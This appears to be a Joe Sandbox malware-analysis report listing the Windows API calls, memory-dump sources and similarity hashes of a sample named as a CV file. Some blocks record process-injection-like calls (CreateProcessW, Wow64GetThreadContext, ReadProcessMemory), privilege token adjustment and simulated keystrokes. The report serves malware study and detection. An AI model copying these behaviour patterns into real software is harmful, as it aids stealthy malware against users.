                                                                                            • Instruction ID: 9d1734ebaf17ccfd70622ef86f0ce6a0361a505ced6842729dd06080319f0895
                                                                                            • Opcode Fuzzy Hash: 390f4851d8416438a35ea92cde3cc301b1221238438242006e58992a0643ed91
                                                                                            • Instruction Fuzzy Hash: 2CE08636141214B7DB211F54BC09FCA7B19AB46F70F104210FF54690F097B125518B98
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0010BB72
                                                                                              • Part of subcall function 000E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000E7A85), ref: 000E1CB1
                                                                                              • Part of subcall function 000E1C9D: GetLastError.KERNEL32(00000000,?,000E7A85), ref: 000E1CC3
                                                                                            • _free.LIBCMT ref: 0010BB83
                                                                                            • _free.LIBCMT ref: 0010BB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                            • Instruction ID: 5249388b2a993271e1c66689dfdecc3fb516cccc93a1b112787c348368e67c40
                                                                                            • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                            • Instruction Fuzzy Hash: 26E012B16457814BDA24657A6E88EF323CC5F44355724081DB499F7187CF74E84085A4
                                                                                            APIs
                                                                                              • Part of subcall function 000C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000C24F1), ref: 000C2303
                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000C25A1
                                                                                            • CoInitialize.OLE32(00000000), ref: 000C2618
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0013503A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3815369404-0
                                                                                            • Opcode ID: 66e147e223db01c76f732c95c8f84c041c7b69b73bd11cef0ff598a61d09d761
                                                                                            • Instruction ID: 7966e7d7621d7b3e940961a6f599f2f78eaa7fa6d17c708eaa8071ad723b8709
                                                                                            • Opcode Fuzzy Hash: 66e147e223db01c76f732c95c8f84c041c7b69b73bd11cef0ff598a61d09d761
                                                                                            • Instruction Fuzzy Hash: 6F71C2B6901341ABC304EF6AA994999BBAEB7593507A0462EE409D7F72DB304683CF14
                                                                                            APIs
                                                                                            • _strcat.LIBCMT ref: 001208FD
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • _wcscpy.LIBCMT ref: 0012098C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf_strcat_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1012013722-0
                                                                                            APIs
                                                                                            • IsThemeActive.UXTHEME ref: 000C3A73
                                                                                              • Part of subcall function 000E1405: __lock.LIBCMT ref: 000E140B
                                                                                              • Part of subcall function 000C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C3AF3
                                                                                              • Part of subcall function 000C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C3B08
                                                                                              • Part of subcall function 000C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000C3AA3,?), ref: 000C3D45
                                                                                              • Part of subcall function 000C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,000C3AA3,?), ref: 000C3D57
                                                                                              • Part of subcall function 000C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00181148,00181130,?,?,?,?,000C3AA3,?), ref: 000C3DC8
                                                                                              • Part of subcall function 000C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,000C3AA3,?), ref: 000C3E48
                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C3AB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                            • String ID:
                                                                                            • API String ID: 924797094-0
                                                                                            APIs
                                                                                            • ___lock_fhandle.LIBCMT ref: 000EEA29
                                                                                            • __close_nolock.LIBCMT ref: 000EEA42
                                                                                              • Part of subcall function 000E7BDA: __getptd_noexit.LIBCMT ref: 000E7BDA
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                            • String ID:
                                                                                            • API String ID: 1046115767-0
                                                                                            APIs
                                                                                              • Part of subcall function 000E395C: __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E395C: __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E395C: RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            • std::exception::exception.LIBCMT ref: 000DF51E
                                                                                            • __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                              • Part of subcall function 000E6805: RaiseException.KERNEL32(?,?,0000000E,00176A30,?,?,?,000DF538,0000000E,00176A30,?,00000001), ref: 000E6856
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 3902256705-0
                                                                                            APIs
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __lock_file.LIBCMT ref: 000E3629
                                                                                              • Part of subcall function 000E4E1C: __lock.LIBCMT ref: 000E4E3F
                                                                                            • __fclose_nolock.LIBCMT ref: 000E3634
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                            • String ID:
                                                                                            • API String ID: 2800547568-0
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01B2613B
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B261D1
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B261F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            APIs
                                                                                            • __flush.LIBCMT ref: 000E2A0B
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __flush__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 4101623367-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            APIs
                                                                                              • Part of subcall function 000C4214: FreeLibrary.KERNEL32(00000000,?), ref: 000C4247
                                                                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000C39FE,?,00000001), ref: 000C41DB
                                                                                              • Part of subcall function 000C4291: FreeLibrary.KERNEL32(00000000), ref: 000C42C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Library$Free$Load
                                                                                            • String ID:
                                                                                            • API String ID: 2391024519-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            APIs
                                                                                            • ___lock_fhandle.LIBCMT ref: 000EAFC0
                                                                                              • Part of subcall function 000E7BDA: __getptd_noexit.LIBCMT ref: 000E7BDA
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$___lock_fhandle
                                                                                            • String ID:
                                                                                            • API String ID: 1144279405-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: ClearVariant
                                                                                            • String ID:
                                                                                            • API String ID: 1473721057-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            APIs
                                                                                            • __lock_file.LIBCMT ref: 000E2AED
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                            • String ID:
                                                                                            • API String ID: 2597487223-0
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,000C39FE,?,00000001), ref: 000C4286
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C40C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: LongNamePath
                                                                                            • String ID:
                                                                                            • API String ID: 82841172-0
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000001F4), ref: 01B26991
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction ID: 78ca3e68df1df819db4596c108c092005a9d805c3662d904f6a05cf139e2f657
                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                            • Instruction Fuzzy Hash: BBE0BF7494010DDFDB00EFA4D5496DE7BB4EF04301F1001A1FD05D2281DA319D508A62
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0012F87D
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012F8DC
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0012F919
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0012F940
                                                                                            • SendMessageW.USER32 ref: 0012F966
                                                                                            • _wcsncpy.LIBCMT ref: 0012F9D2
                                                                                            • GetKeyState.USER32(00000011), ref: 0012F9F3
                                                                                            • GetKeyState.USER32(00000009), ref: 0012FA00
                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012FA16
                                                                                            • GetKeyState.USER32(00000010), ref: 0012FA20
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0012FA4F
                                                                                            • SendMessageW.USER32 ref: 0012FA72
                                                                                            • SendMessageW.USER32(?,00001030,?,0012E059), ref: 0012FB6F
                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0012FB85
                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0012FB96
                                                                                            • SetCapture.USER32(?), ref: 0012FB9F
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FC03
                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0012FC0F
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0012FC29
                                                                                            • ReleaseCapture.USER32 ref: 0012FC34
                                                                                            • GetCursorPos.USER32(?), ref: 0012FC69
                                                                                            • ScreenToClient.USER32(?,?), ref: 0012FC76
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0012FCD8
                                                                                            • SendMessageW.USER32 ref: 0012FD02
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0012FD41
                                                                                            • SendMessageW.USER32 ref: 0012FD6C
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0012FD84
                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0012FD8F
                                                                                            • GetCursorPos.USER32(?), ref: 0012FDB0
                                                                                            • ScreenToClient.USER32(?,?), ref: 0012FDBD
                                                                                            • GetParent.USER32(?), ref: 0012FDD9
                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0012FE3F
                                                                                            • SendMessageW.USER32 ref: 0012FE6F
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FEC5
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0012FEF1
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0012FF19
                                                                                            • SendMessageW.USER32 ref: 0012FF3C
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012FF86
                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0012FFB6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0013004B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                            • String ID: @GUI_DRAGID$F
                                                                                            • API String ID: 2516578528-4164748364
                                                                                            • Opcode ID: d3fab0895f6cf0709ed827d8854e877d674cea522f47ede6dd8244fdf553a42e
                                                                                            • Instruction ID: 7e7f9cdda594c6e23483a6abf9039b75744329790531229374c99702bcf45357
                                                                                            • Opcode Fuzzy Hash: d3fab0895f6cf0709ed827d8854e877d674cea522f47ede6dd8244fdf553a42e
                                                                                            • Instruction Fuzzy Hash: FD32C979A00254AFDB14CF64E880BAABBB8FF49344F14063DF695872A1D770DDA2CB51
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0012B1CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: %d/%02d/%02d
                                                                                            • API String ID: 3850602802-328681919
                                                                                            • Opcode ID: ca028ca276b4ad6bfbef5c9781210c4df6c46f189dba84988ae68f10b7069e27
                                                                                            • Instruction ID: 88dc150d003b18fb088ccc23c350bf3f110ffa631b824144cc927e53f5e8533e
                                                                                            • Opcode Fuzzy Hash: ca028ca276b4ad6bfbef5c9781210c4df6c46f189dba84988ae68f10b7069e27
                                                                                            • Instruction Fuzzy Hash: 9E12F171604229AFEB249F64EC89FAE7BB8FF45310F114119F916DB2E1DB708961CB21
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 000DEB4A
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00133AEA
                                                                                            • IsIconic.USER32(000000FF), ref: 00133AF3
                                                                                            • ShowWindow.USER32(000000FF,00000009), ref: 00133B00
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133B0A
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00133B20
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00133B27
                                                                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00133B33
                                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00133B44
                                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00133B4C
                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00133B54
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133B57
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B6C
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B77
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B81
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B86
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B8F
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133B94
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00133B9E
                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00133BA3
                                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00133BA6
                                                                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00133BCD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 4125248594-2988720461
                                                                                            • Opcode ID: 898e7a7bb09b70fe2b1fc82e747872d776b1a803f5f910cea1ed78b5de8fe7cb
                                                                                            • Instruction ID: 7e4fc1daf8e649bf0b71dde22538c854afd9f2e5fab83e41a2626fe38e1b0ccc
                                                                                            • Opcode Fuzzy Hash: 898e7a7bb09b70fe2b1fc82e747872d776b1a803f5f910cea1ed78b5de8fe7cb
                                                                                            • Instruction Fuzzy Hash: 39319275A40318BBEF206BA5AC49F7F7E7CEB45B50F114025FA05EA1E0DBB05D40AAA4
                                                                                            APIs
                                                                                              • Part of subcall function 000FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                              • Part of subcall function 000FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                              • Part of subcall function 000FB134: GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            • _memset.LIBCMT ref: 000FAD08
                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000FAD5A
                                                                                            • CloseHandle.KERNEL32(?), ref: 000FAD6B
                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000FAD82
                                                                                            • GetProcessWindowStation.USER32 ref: 000FAD9B
                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 000FADA5
                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000FADBF
                                                                                              • Part of subcall function 000FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000FACC0), ref: 000FAB99
                                                                                              • Part of subcall function 000FAB84: CloseHandle.KERNEL32(?,?,000FACC0), ref: 000FABAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                            • String ID: $default$winsta0
                                                                                            • API String ID: 2063423040-1027155976
                                                                                            • Opcode ID: 9e27a5249b3a7afd7b5d2f1d429d697a4f7422b21d06a71315f949b7b5ddf570
                                                                                            • Instruction ID: 7cfe78727a1e65fc7e689e010a2ba10d92b3c2e9152e57112ce527d38a808821
                                                                                            • Opcode Fuzzy Hash: 9e27a5249b3a7afd7b5d2f1d429d697a4f7422b21d06a71315f949b7b5ddf570
                                                                                            • Instruction Fuzzy Hash: E4818EB1A0020DAFDF119FA4DC45AFE7BB8FF06304F044129FA18A6961D7718E55EB61
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00105FA6,?), ref: 00106EF1
                                                                                              • Part of subcall function 0010725E: __wsplitpath.LIBCMT ref: 0010727B
                                                                                              • Part of subcall function 0010725E: __wsplitpath.LIBCMT ref: 0010728E
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • _wcscat.LIBCMT ref: 00106149
                                                                                            • _wcscat.LIBCMT ref: 00106167
                                                                                            • __wsplitpath.LIBCMT ref: 0010618E
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001061A4
                                                                                            • _wcscpy.LIBCMT ref: 00106209
                                                                                            • _wcscat.LIBCMT ref: 0010621C
                                                                                            • _wcscat.LIBCMT ref: 0010622F
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0010625D
                                                                                            • DeleteFileW.KERNEL32(?), ref: 0010626E
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00106289
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00106298
                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 001062AD
                                                                                            • DeleteFileW.KERNEL32(?), ref: 001062BE
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001062E1
                                                                                            • FindClose.KERNEL32(00000000), ref: 001062FD
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010630B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
